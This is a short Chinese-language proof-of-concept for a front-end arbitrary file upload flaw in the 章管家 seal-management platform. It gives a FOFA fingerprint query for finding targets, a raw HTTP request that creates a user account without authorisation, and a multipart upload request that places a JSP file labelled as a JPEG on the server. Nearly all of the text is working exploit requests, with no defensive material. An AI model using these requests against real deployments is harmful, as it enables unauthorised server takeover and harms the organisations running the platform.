章管家是上海建业信息科技股份有限公司推出的一款针对传统印章风险管理提供的整套解决方案的工具。 该系统存在前台任意文件上传漏洞,攻击者成功利用该漏洞可以上传任意文件,从而获得服务器权限。
app="章管家-印章智慧管理平台"
1、使用以下 PoC 新建用户
POST /api/personSeal_jdy/saveUser.htm HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=ed467a70-91e9-450d-a2c1-db1fab8123ad
Connection: close
Content-Type: application/json
Content-Length: 211
{"op":{},"data":{"mobile":"13333333333","uid":"13333333333","password":"12345
6","name":"testuser","return_url":"https://www.baidu.com","apisecretkey":"1","_id
":"1","mail_address":"[email protected]"},"b7o4ntosbfp":"="}
2、通过刚才的用户登陆获取 Cookie ,使用以下 PoC 上传文件
POST /seal/sealApply/uploadFileByChunks.htm?token=dingtalk_token&person_id=40288053800311e80180261b92ab005e&chunk=1&chunks=1&guid=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)
Gecko/20100101 Firefox/128.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language:
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: sid=58139d92-115f-4e9b-99a1-ee200a8b17a0;
ZHANGIN_CHECKBOX=false; ZHANGIN_MOBILE=;JSESSIONID=30A3F3F324080E3B327FEB2EB82E2CB0
Content-Type: multipart/form-data; boundary=--------952870761
Content-Length: 140
----------952870761
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/jpeg
<%@ page import= "java.io.File" %>
<%
out.println("111");
String filePath = application.getRealPath(request.getServletPath());
out.println(filePath);
new File(filePath).delete();
%>
----------952870761--